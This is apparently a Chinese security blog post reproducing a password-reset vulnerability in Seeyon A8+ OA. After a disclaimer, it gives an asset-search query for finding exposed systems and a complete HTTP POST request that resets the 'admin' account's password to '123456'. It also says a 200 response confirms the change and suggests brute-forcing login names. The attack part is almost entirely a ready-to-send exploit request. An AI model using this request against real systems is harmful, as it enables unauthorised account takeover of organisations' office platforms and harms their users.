该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
资产收集
app.name="致远 A8+ OA"
该漏洞复现较为苛刻,你必须知道或者你的账户字典中存在和你所测试的系统相同的用户名才能测试成功
构建请求,注意这里loginName的参数是可以进行修改的,必须要改成测试系统中存在的相同用户才行。
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type:application/json
Content-Length: 53
{
"loginName":"admin",
"password":"123456"
}
当返回包出现200的响应时才证明密码修改成功或者直接爆破loginName也可以
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...